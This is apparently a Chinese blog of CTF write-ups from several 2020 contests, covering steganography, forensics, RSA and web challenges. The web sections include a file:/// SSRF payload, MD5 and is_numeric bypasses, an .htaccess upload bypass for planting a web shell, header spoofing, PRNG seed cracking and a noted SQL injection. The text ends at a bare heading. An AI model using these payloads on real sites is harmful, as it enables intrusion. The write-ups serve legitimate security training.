2020CTF WP

2020RoarCTF Misc Writeup

签到

签到比后面难系列.jpg

1

?url=file:///%25%36%36%25%36%63%25%36%31%25%36%37

Hi_433MHz

是铁憨憨没错，不看软件提示，建议去爬。

直接拖到audacity提示如下。

按照他说的导入文件，明显看到长短，一个九位不是摩斯，八位是二进制，最后一位应该是奇偶校验。

于是手撸得到

1

flag{25c21b0d-6a11-4312-971b-428d01cdc534}

FM

软件装了一天，比赛结束后才知道直接听，然而虚拟机声卡被我删了。

我铁憨憨了，四舍五入也算我ak吧球球了。

2020SWPUCTF Misc&Crypto Writeup

嘶哄无线电自闭过来随便玩一玩。

Misc

套娃

1
2


# RC4data.txt
U2FsdGVkX19uI2lzmxYrQ9mc16y7la7qc7VTS8gLaUKa49gzXPclxRXVsRJxWz/p

1
2
3
4


# 查看hex得到压缩包密码
6e4c834d77cba03af41e1562a5bce84e
# 解压得到rc4key
ABCDEFGHIJKLMNOPQRSTUVWXYZ

1
2


# 在线解密得到flag
ef1a73d40977a49b99b871980f355757

耗子尾汁

视频中明显有一串东西闪过

1
2
3
4


# base64
c2lnbl9pbg==
# 解密得到
sign_in

视频尾部有个zip用上面密码解压得到如下

1
2
3


R1pCVE9OUlhHVTNES05SWkdZWVRNUVJYSEEzVEtOUlVHNFpUT09KWEdFM0RLTlJZRzRaVE9RSlhHRTNEUU5aWkdaQkRNTlpXRzQzVEdOWlpHNDRUTVFaV0lJM1RNTlpXR1k0UT09PT0=

//The last layer is the single table replacement password

base64，32然后16进制转字符串

1
2
3
4


lvueiakxudsyqehszqhykggsyylkvvi
fladybuganeshdiephisuccessfully
flagyouhavesignedinsuccessfully
xxx_xxxx_xxxxxx_xx_xxxxxxxxxxxx

来找我吧

1

key is PPPaAaS

得到findme.mp3和secret.rar,file看一下发现findme.mp3是rar5,改后缀解压得到哈哈哈.png和采茶纪.mp3,secret.rar是真的加密，简单hashcat爆破了一下无解应该是要继续找密码了。

音频开头有类似于拨号音。

末尾有一段摩斯密码

解密得到D43963E92B012AAB 是一条要钱的md5 穷人不配呜呜呜。hash出来是n1ce_try,解压secret.rar得到一个gif和一个png,gif一帧如下图。

发现hint.png crc不对，修复后得到hint:Veni,Vidi,Vici直接搜索这个hint发现是凯撒

凯撒得到flag{sWpu_N1c3_Try}

来猜谜吧

得到probelm.png，用zsteg分出一个zip,其尾部有其他内容，删除即可正常解压。得到uuu.pcap是一个鼠标流量，还有一个mi.jpg。

1
2


# 鼠标流量如图
AG<SPACE>DX<SPACE>AG<SPACE>DX<SPACE>AG<SPACE>DX

直接对ADFGX表解密得到gogogo

\	A	D	F	G	X
A	p	h	q	g	m
D	e	a	y	n	o
F	f	d	x	k	r
G	c	v	s	z	w
X	b	u	t	i	l

现在只剩下一个jpg了，带密码的jpg隐写盲猜outguess

得到flag{Out9uEsS_1s_V4rY_e4sy}

Crypto

happy

签到rsa

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


from z3 import *
import gmpy2
from Crypto.Util.number import *
c=0x7a7e031f14f6b6c3292d11a41161d2491ce8bcdc67ef1baa9e
e=0x872a335
#q + q*p^3 =1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586
# q+q*p**3=
#qp + q *p^2 = 1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594
# q*p+q*p**2
# s = Solver()
# p = Int('p')
# q = Int('q')
# s.add(q+q*p**3==1285367317452089980789441829580397855321901891350429414413655782431779727560841427444135440068248152908241981758331600586)
# s.add(q*p+q*p**2==1109691832903289208389283296592510864729403914873734836011311325874120780079555500202475594)
# if s.check() == sat:
#     print(s.model())
q = 827089796345539312201480770649
p = 1158310153629932205401500375817
n=p*q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))

2020西湖论剑Misc部分wp

说是wp，不如说是被虐记录，啥都没做出来，铁废物了。希望看到的师傅轻点喷。
希望有师傅能指导一下弟弟，主页有联系方式。

Yusa_yyds

官方wp说的震动一下四个包，咱也不知道，咱也不敢问。

过滤出xbox的流量

usb.addr == "2.15.2"

直接上图，我把时间间隔的第一个包都标记出来，这样就很明显了。

114514取32位小写md5就是flag

PS：同学有手柄到时候来试试看

Yusapapa

网页源码有个hint。Biometric list搜到 PGP词汇表，github有解码的，得到如下

1
2
3


You can see my collection puzzles in /hint.rar and another /encode.png.
By the way,the picture shoud be used 
"Yusa" is very important in this challenge!!

后来自己也写了个脚本，GitHub地址欢迎star

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


cipher = """
endow gremlin indulge bison flatfoot fallout goldfish bison hockey fracture fracture bison goggles jawbone bison flatfoot gremlin glucose glucose fracture flatfoot indoors gazelle gremlin goldfish bison guidance indulge keyboard keyboard glucose fracture hockey bison gazelle goldfish bison cement frighten gazelle goldfish indoors buzzard highchair fallout highchair bison fallout goldfish flytrap bison fallout goldfish gremlin indoors frighten fracture highchair bison cement fracture goldfish flatfoot gremlin flytrap fracture buzzard guidance goldfish freedom buzzard allow crowfoot jawbone bison indoors frighten fracture bison involve fallout jawbone Burbank indoors frighten fracture bison guidance gazelle flatfoot indoors indulge highchair fracture bison hockey frighten gremlin indulge flytrap bison flagpole fracture bison indulge hockey fracture flytrap bison allow blockade endow indulge hockey fallout blockade bison gazelle hockey bison inverse fracture highchair jawbone bison gazelle goggles guidance gremlin highchair indoors fallout goldfish indoors bison gazelle goldfish bison indoors frighten gazelle hockey bison flatfoot frighten fallout glucose glucose fracture goldfish freedom fracture blackjack blackjack
"""
cipher = cipher.split()
odd_list = ['aardvark', 'absurd', 'accrue', 'acme', 'adrift', 'adult', 'afflict', 'ahead', 'aimless', 'Algol', 'allow', 'alone', 'ammo', 'ancient', 'apple', 'artist', 'assume', 'Athens', 'atlas', 'Aztec', 'baboon', 'backfield', 'backward', 'banjo', 'beaming', 'bedlamp', 'beehive', 'beeswax', 'befriend', 'Belfast', 'berserk', 'billiard', 'bison', 'blackjack', 'blockade', 'blowtorch', 'bluebird', 'bombast', 'bookshelf', 'brackish', 'breadline', 'breakup', 'brickyard', 'briefcase', 'Burbank', 'button', 'buzzard', 'cement', 'chairlift', 'chatter', 'checkup', 'chisel', 'choking', 'chopper', 'Christmas', 'clamshell', 'classic', 'classroom', 'cleanup', 'clockwork', 'cobra', 'commence', 'concert', 'cowbell', 'crackdown', 'cranky', 'crowfoot', 'crucial', 'crumpled', 'crusade', 'cubic', 'dashboard', 'deadbolt', 'deckhand', 'dogsled', 'dragnet', 'drainage', 'dreadful', 'drifter', 'dropper', 'drumbeat', 'drunken', 'Dupont', 'dwelling', 'eating', 'edict', 'egghead', 'eightball', 'endorse', 'endow', 'enlist', 'erase', 'escape', 'exceed', 'eyeglass', 'eyetooth', 'facial', 'fallout', 'flagpole', 'flatfoot', 'flytrap', 'fracture', 'framework', 'freedom', 'frighten', 'gazelle', 'Geiger', 'glitter', 'glucose', 'goggles', 'goldfish', 'gremlin', 'guidance', 'hamlet', 'highchair', 'hockey', 'indoors', 'indulge', 'inverse', 'involve', 'island', 'jawbone', 'keyboard', 'kickoff', 'kiwi', 'klaxon', 'locale', 'lockup', 'merit', 'minnow', 'miser', 'Mohawk', 'mural', 'music', 'necklace', 'Neptune', 'newborn', 'nightbird', 'Oakland', 'obtuse', 'offload', 'optic', 'orca', 'payday', 'peachy', 'pheasant', 'physique', 'playhouse', 'Pluto', 'preclude', 'prefer', 'preshrunk', 'printer', 'prowler', 'pupil', 'puppy', 'python', 'quadrant', 'quiver', 'quota', 'ragtime', 'ratchet', 'rebirth', 'reform', 'regain', 'reindeer', 'rematch', 'repay', 'retouch', 'revenge', 'reward', 'rhythm', 'ribcage', 'ringbolt', 'robust', 'rocker', 'ruffled', 'sailboat', 'sawdust', 'scallion', 'scenic', 'scorecard', 'Scotland', 'seabird', 'select', 'sentence', 'shadow', 'shamrock', 'showgirl', 'skullcap', 'skydive', 'slingshot', 'slowdown', 'snapline', 'snapshot', 'snowcap', 'snowslide', 'solo', 'southward', 'soybean', 'spaniel', 'spearhead', 'spellbind', 'spheroid', 'spigot', 'spindle', 'spyglass', 'stagehand', 'stagnate', 'stairway', 'standard', 'stapler', 'steamship', 'sterling', 'stockman', 'stopwatch', 'stormy', 'sugar', 'surmount', 'suspense', 'sweatband', 'swelter', 'tactics', 'talon', 'tapeworm', 'tempest', 'tiger', 'tissue', 'tonic', 'topmost', 'tracker', 'transit', 'trauma', 'treadmill', 'Trojan', 'trouble', 'tumor', 'tunnel', 'tycoon', 'uncut', 'unearth', 'unwind', 'uproot', 'upset', 'upshot', 'vapor', 'village', 'virus', 'Vulcan', 'waffle', 'wallet', 'watchword', 'wayside', 'willow', 'woodlark', 'Zulu']
even_list = ['adroitness', 'adviser', 'aftermath', 'aggregate', 'alkali', 'almighty', 'amulet', 'amusement', 'antenna', 'applicant', 'Apollo', 'armistice', 'article', 'asteroid', 'Atlantic', 'atmosphere', 'autopsy', 'Babylon', 'backwater', 'barbecue', 'belowground', 'bifocals', 'bodyguard', 'bookseller', 'borderline', 'bottomless', 'Bradbury', 'bravado', 'Brazilian', 'breakaway', 'Burlington', 'businessman', 'butterfat', 'Camelot', 'candidate', 'cannonball', 'Capricorn', 'caravan', 'caretaker', 'celebrate', 'cellulose', 'certify', 'chambermaid', 'Cherokee', 'Chicago', 'clergyman', 'coherence', 'combustion', 'commando', 'company', 'component', 'concurrent', 'confidence', 'conformist', 'congregate', 'consensus', 'consulting', 'corporate', 'corrosion', 'councilman', 'crossover', 'crucifix', 'cumbersome', 'customer', 'Dakota', 'decadence', 'December', 'decimal', 'designing', 'detector', 'detergent', 'determine', 'dictator', 'dinosaur', 'direction', 'disable', 'disbelief', 'disruptive', 'distortion', 'document', 'embezzle', 'enchanting', 'enrollment', 'enterprise', 'equation', 'equipment', 'escapade', 'Eskimo', 'everyday', 'examine', 'existence', 'exodus', 'fascinate', 'filament', 'finicky', 'forever', 'fortitude', 'frequency', 'gadgetry', 'Galveston', 'getaway', 'glossary', 'gossamer', 'graduate', 'gravity', 'guitarist', 'hamburger', 'Hamilton', 'handiwork', 'hazardous', 'headwaters', 'hemisphere', 'hesitate', 'hideaway', 'holiness', 'hurricane', 'hydraulic', 'impartial', 'impetus', 'inception', 'indigo', 'inertia', 'infancy', 'inferno', 'informant', 'insincere', 'insurgent', 'integrate', 'intention', 'inventive', 'Istanbul', 'Jamaica', 'Jupiter', 'leprosy', 'letterhead', 'liberty', 'maritime', 'matchmaker', 'maverick', 'Medusa', 'megaton', 'microscope', 'microwave', 'midsummer', 'millionaire', 'miracle', 'misnomer', 'molasses', 'molecule', 'Montana', 'monument', 'mosquito', 'narrative', 'nebula', 'newsletter', 'Norwegian', 'October', 'Ohio', 'onlooker', 'opulent', 'Orlando', 'outfielder', 'Pacific', 'pandemic', 'Pandora', 'paperweight', 'paragon', 'paragraph', 'paramount', 'passenger', 'pedigree', 'Pegasus', 'penetrate', 'perceptive', 'performance', 'pharmacy', 'phonetic', 'photograph', 'pioneer', 'pocketful', 'politeness', 'positive', 'potato', 'processor', 'provincial', 'proximate', 'puberty', 'publisher', 'pyramid', 'quantity', 'racketeer', 'rebellion', 'recipe', 'recover', 'repellent', 'replica', 'reproduce', 'resistor', 'responsive', 'retraction', 'retrieval', 'retrospect', 'revenue', 'revival', 'revolver', 'sandalwood', 'sardonic', 'Saturday', 'savagery', 'scavenger', 'sensation', 'sociable', 'souvenir', 'specialist', 'speculate', 'stethoscope', 'stupendous', 'supportive', 'surrender', 'suspicious', 'sympathy', 'tambourine', 'telephone', 'therapist', 'tobacco', 'tolerance', 'tomorrow', 'torpedo', 'tradition', 'travesty', 'trombonist', 'truncated', 'typewriter', 'ultimate', 'undaunted', 'underfoot', 'unicorn', 'unify', 'universe', 'unravel', 'upcoming', 'vacancy', 'vagabond', 'vertigo', 'Virginia', 'visitor', 'vocalist', 'voyager', 'warranty', 'Waterloo', 'whimsical', 'Wichita', 'Wilmington', 'Wyoming', 'yesteryear', 'Yucatan']

for i in range(len(cipher)):
    for j in range(len(odd_list)):
        if odd_list[j] == cipher[i]:
            cipher[i:i+1] = chr(j)
    for k in range(len(even_list)):
        if odd_list[k] == cipher[i]:
            cipher[i:i+1] = chr(k)

for i in cipher:
    print(i,end='')

GitHub找到个stegpy的项目

1

pip3 install stegpy

1
2


$ stegpy.exe encode.webp
the_password_is:Yus@_1s_YYddddsstegpy encode.webp the_key_is:Yus@_yydsstegpy!!

得到两个密码都试了一下第二个能解hint.rar得到一个hint.jpg

官方放了个hint：invisible 不然我要骂人了。InvisibleSecre隐写华军上下了一个很古老的软件。。。。

网页源码里说"Yusa"在这题很重要用"Yusa"解密，加密算法选最后一个，得到encode脚本

简单分析一下是生成两个随机密钥流然后跟flag.png 每像素异或然后用lsb原理往source.png像素里加flag.png 流1加密在R通道流2加密在G通道 enc写到B通道

解密只需各个取出最后一位然后异或回来就是flag了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48


from PIL import Image
en_p = Image.open('./encode.png').convert('RGB')
a,b = en_p.size
R=[]
G=[]
B=[]
key1stream = []
key2stream = []
enc = []
flag = []

for x in range(a):
    for y in range(b):
        tmp = en_p.getpixel((x,y)) 
        R.append(tmp[0])
        G.append(tmp[1])
        B.append(tmp[2])

# 取出lsb数据
for i in range(len(R)):
    if bin(R[i])[-1] == '1':
        key1stream.append(1)
    else:
        key1stream.append(0)

    if bin(G[i])[-1] == '1':
        key2stream.append(1)
    else:
        key2stream.append(0)

    if bin(B[i])[-1] == '1':
        enc.append(1)
    else:
        enc.append(0)

# 恢复flag
for i in range(len(enc)):
    flag.append(enc[i]^key1stream[i]^key2stream[i])

# 简单画一下
img = Image.new('RGB',(a,b),(255,255,255))
for x in range(a):
    for y in range(b):
        if flag[y+x*b] == 0:
            img.putpixel((x,y),(0,0,0))
        else:
            img.putpixel((x,y),(255,255,255))
img.save('flag.png')

指鹿为马

CNN 我继续爬
据说ps一下也成，没成功，呜呜呜

opencv改下透明度拼一下图

1
2
3
4
5
6


import cv2 as cv
alpha = 0.5
horse = cv.imread('horse.png')
deer = cv.imread('deer.png')
dst = cv.addWeighted(horse, alpha, deer, 0.4, 0.0)
cv.imwrite('image.png', dst)

复现的时候靶机已经关了，本地魔改了一下能跑出来。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


def main():
    while 1:
        pic = base64.b64encode(open('./image.png', "rb").read())
        try:
            pic = base64.b64decode(pic)
        except:
            exit()
        if b"<?php" in pic or b'eval' in pic:
            print("Hacker!!This is not WEB,It`s Just a misc!!!")
            exit()
        salt = str(random.getrandbits(15))
        pic_name = 'tmp_'+salt+'.png'
        tmp_pic = open(pic_name,'wb')
        tmp_pic.write(pic)
        tmp_pic.close()
        ma = load_horse()
        lu = load_deer()
        k = 1
        trainingSet = np.append(ma, lu).reshape(2, 5185)
        testSet = load_test(pic_name)
        neighbors = getNeighbors(trainingSet, testSet[0], k)
        result = getResponse(neighbors)
        if repr(result) == '0':
            print('Yes,I want this horse like deer,here is your flag encoded by base64')
            flag = base64.b64encode(open('flag','rb').read())
            print(flag.decode())
            os.remove(pic_name)
            break
        else:
            print('I want horse but not deer!!!')
            os.remove(pic_name)
            break
    exit()

Barbar

得到一个附件超大QRcode，CQR扫码看到一串问号，微信扫码却没看到，第一反应就是零宽字符。

但是一开始找的网站解密错误得到错的，然后整个题目毫无进展。最后得到一个能正确解的网站。。。。wsfw没错了

1
2


False:ntentteanetekettterieeenaeatttedtttt
True:YcfVgMBUraXftwO6Cp92YBGAbyRyWNOO

解压得到一个破损二维码和一个docx，修复二维码扫描得到这个，我透！

docx丢kali在document.xml里找到一串base64

去掉中间的字符后解码得到一个Aztec Code

可以在线解码得到一串flag类似物

di`f{e1c64e14db14c6bb8faabab5bd7be1dc}

至此无后续了，只有感觉没用到题目hint：bar和bar之间有着非同寻常的联系

感觉那个修复的二维码里还有东西

好了，官方出wp了，我是废物，使用npiet出flag

第一届太湖杯Misc题解

memory

签到题

1
2
3
4


问windows动态链接库管家吧，他会告诉你answer

原始题目下载地址：https://pan.baidu.com/s/1tmM-wjyMZ_SHdDJ82Qaq7A(3qci)
提前下发的题目压缩包密码：welc0me_to_Asuri_w0rld

题目给的hint感觉有误导性，提示看dll，然是列了一下啥也看不出。然后去给做了web签到题，看了其余两个misc大致啥样，回来继续做。

1
2
3
4
5
6


# iehistory看到桌面的Desktop/Untitled.png
volatility -f dump --profile=Win7SP1x86 iehistory
# filescan看一下地址
volatility -f dump --profile=Win7SP1x86 filescan | grep "Untitled.png"
# dumpfiles弄下图片 里面就是flag
volatility -f dump --profile=Win7SP1x86 dumpfiles -Q 0x000000003fdf6118 -D ./

拿了个一血还是很香的

misc

这是最让人蛋疼的一题，这题出的真不太行。

得到一个zip，解压可以得到fun.zip 同时伪加密可以得到omisc.docx

docx里有两行隐藏文字

1
2


waoootu.epj,nv o
www.verymuch.net

前面一直没人解出来，知道给了hint是希尔密码，使用在线工具解得

1

love and peaceee

rabiit解密得到

1

LR2TMNLCGBOHKNDGGVRFY5JWGZTDAXDVMZTDCYK4OU4GCZRYLR2TSNTCHBOHKNJUMM4VY5JVGBSTOXDVHE3DIZC4OU2TIM3ELR2TQYLGHBOHKOJWGQYFY5JWGQ3DSXDVHE3GEOC4OU2TAZJXLR2TOZRTMROHKOBVME4VY5JVGRQTIXDVHAYDEOC4OU4GCZRYLR2TSNTCHBOHKNRRGY3VY5JVHA2WKXDVHAZDOMS4OU2WGMDBLR2TKNDDHFOHKODGMU3FY5JYMFSTMXDVG5QTOYK4OU3DENBQLR2TSNRUMROHKNRSGEYVY5JVMZTDKXDVHE3GEOC4OU3TSNJXLR2TQYLFGZOHKNLGMY2VY5JVGRRTSXDVHE3DIMC4OU2TMYRULR2TKNDDHFOHKNJWMM4VY5JUMZSWKXDVGU4TGN24OU4TMM3GLR2TMY3FGJOHKOBSG4ZFY5JYGM4GCXDVGVRGGMS4OU4GCZJWLR2TKOBVMVOHKNJUHEZFY5JYGM4GCXDVG43TGZK4OU3DEMJRLR2TKNDDHFOHKNRSGQYFY5JUMYYGMXDVHAYDKZK4OU4DKYJZLR2TSNTCHBOHKNRRGBSFY5JZGVRWIXDVGU2DGNS4OU3DENBQLR2TIZTFMVOHKNRWGJTFY5JYGI3TEXDVGY2DMOK4OU4GCMZWLR2TKNTCGROHKNJUMM4VY5JZHA2TQXDVGYYTAZC4OU2TIYZZLR2TKMZXGNOHKNDGMVSVY5JVGRRTSXDVG5QTOYK4OU4DOMLDLR2TSNRUGBOHKNJWMM4VY5JUMYYGMXDVGVTGMNK4OU2TIYZZLR2TMNBWHFOHKNJUMM4VY5JUMVQTMXDVHAZTQYK4OU2TIYZZLR2TONZTMVOHKNJUME2FY5JVHE4DEXDVHE4DKOC4OU2TSOBS

base32得到

1

b'\\u65b0\\u4f5b\\u66f0\\uff1a\\u8af8\\u96b8\\u54c9\\u50e7\\u964d\\u543d\\u8af8\\u9640\\u6469\\u96b8\\u50e7\\u7f3d\\u85a9\\u54a4\\u8028\\u8af8\\u96b8\\u6167\\u585e\\u8272\\u5c0a\\u54c9\\u8fe6\\u8ae6\\u7a7a\\u6240\\u964d\\u6211\\u5ff5\\u96b8\\u7957\\u8ae6\\u5ff5\\u54c9\\u9640\\u56b4\\u54c9\\u56c9\\u4fee\\u5937\\u963f\\u6ce2\\u8272\\u838a\\u5bc2\\u8ae6\\u585e\\u5492\\u838a\\u773e\\u6211\\u54c9\\u6240\\u4f0f\\u805e\\u85a9\\u96b8\\u610d\\u95cd\\u5436\\u6240\\u4fee\\u662f\\u8272\\u6469\\u8a36\\u56b4\\u54c9\\u9858\\u610d\\u54c9\\u5373\\u4fee\\u54c9\\u7a7a\\u871c\\u9640\\u56c9\\u4f0f\\u5ff5\\u54c9\\u6469\\u54c9\\u4ea6\\u838a\\u54c9\\u773e\\u54a4\\u5982\\u9858\\u5982'

unicode得到

1

新佛曰：諸隸哉僧降吽諸陀摩隸僧缽薩咤耨諸隸慧塞色尊哉迦諦空所降我念隸祗諦念哉陀嚴哉囉修夷阿波色莊寂諦塞咒莊眾我哉所伏聞薩隸愍闍吶所修是色摩訶嚴哉願愍哉即修哉空蜜陀囉伏念哉摩哉亦莊哉眾咤如願如

新佛曰得到

1

Live beautifully, dream passionately, love completely.

解密前面的zip得到音频，频谱图就是flag

broken_secret

给了个hint：图上信息很重要

这题最后就四个解，我没解出来。

解压得到不能打开的pdf，发现里面obj的o被替换乘了@，换回来就能正常打开了，有个fakeflag，然后里面好像还有两个stream没有被解析，不会做了。

2020MRCTF writeup

ez_bypass

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41


<?php
I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

源码简单分析就是要md5绕过+is_numeric绕过

你传你🐎呢

尝试以后发现只能上传图片图片上传后但是连不上

尝试上传其他文件但是全都不行考虑 .htaccess 允许上传

但是 .htaccess 也不能传传个图片抓包改下 .htaccess

最后再传个图片改成 ma.ma 就上传成功了准备蚁剑

有时候能连成功有时候疯狂报错连上后也很满很慢。。。

最后找到在flag在根目录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


# 连上后能看到的upload.php
<?php
session_start();
echo "
<meta charset=\"utf-8\">";
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("我扌your problem?");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")|| ($_FILES["uploaded"]["type"] == "image/png")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
			mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
			move_uploaded_file($uploaded_tmp, $t_path);
			echo "{$t_path} succesfully uploaded!";
        }
        else{
            die("我扌your problem?");
        }
    }
}
?>

PYwebsite

第一眼看到题目还以为是py写的website 结果是这题可以付钱py 哈哈有点意思

其实我在首页看了挺久的啥也没有。。。。
然后看了一下 Target 眼前一亮

抓包说他自己可以获得很明显的xff了

改下xff轻松获取flag

套娃

就套娃呗。。。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


#第一层
#payload——http://5772a629-7e5b-45aa-9414-ce874dd6d4ab.merak-ctf.site/?b.u.p.t=23333%0a
#php解析会把 . 解析成 _ 
#有师傅说这里只过滤了 %0f 其实用 %0F 也可以绕过 但是我试了不行
<?php
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

提示flag在secrettw.php 查看源码是js console跑一下提示传 Merak(本来我看到页面的ip还以为要改xff呢结果传个参就行)

传参127.0.0.1出源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


#第二层
#payload——http://e89f0e7e-b386-4abc-b337-95227c876cf3.merak-ctf.site/secrettw.php?2333=%64%61%74%61%3a%2c%74%6f%64%61%74%20%69%73%20%61%20%68%61%70%70%79%20%64%61%79&file=ZmpdYSZmXGI=
<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 	#为打开文件设置默认当前文件夹
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?> 

这里有个逆向

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


#ord — 转换字符串第一个字节为 0-255 之间的值
#chr — 返回指定的字符
#两个是互补的 整个意思就是
#$_GET['file']最后要变成flag.php
#1.base64解码
#2.逐位ord后加02468....后返回
#稍微改一下写个php脚本就行
$v="flag.php";
function change($v){
    $re = '';
    for($i=0;$i<strlen($v);$i++){
//        $re .= chr ( ord ($v[$i]) + $i*2 );
        $re .= chr ( ord ($v[$i]) - $i*2 );
    }
    return $re;
}
echo base64_encode(change($v));

这题改xff是不行的要改 client-ip 原因看源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


#takeip.php
<?php
function getIp()
{
    if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    } else {
        if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
            return  "sorry,this way is banned!";
        } else {
            if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
                $ip = $_SERVER["REMOTE_ADDR"];
            } else {
                if (isset ($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],
                        "unknown")
                ) {
                    $ip = $_SERVER['REMOTE_ADDR'];
                } else {
                    $ip = "unknown";
                }
            }
        }
    }
    return ($ip);
}

Ezaudit

进去一个很正经的网站链接全没用就是个空网站

扫站看到令人欣慰的绿色

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53


#压缩包就一个login.php
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥，咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

简单分析就是让你用公钥找私钥然后连数据库 password 这里有个简单的SQL注入

这是个伪随机数 mt_scrand()和mt_rand() 使用脚本php_mt_seed爆破

种子 1775196155 生成私钥 XuNhoueCDCGc

Ezpop

进去直接是源码提示 flag在flag.php

让学习反序列化魔法方法就是个反序列化的题

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
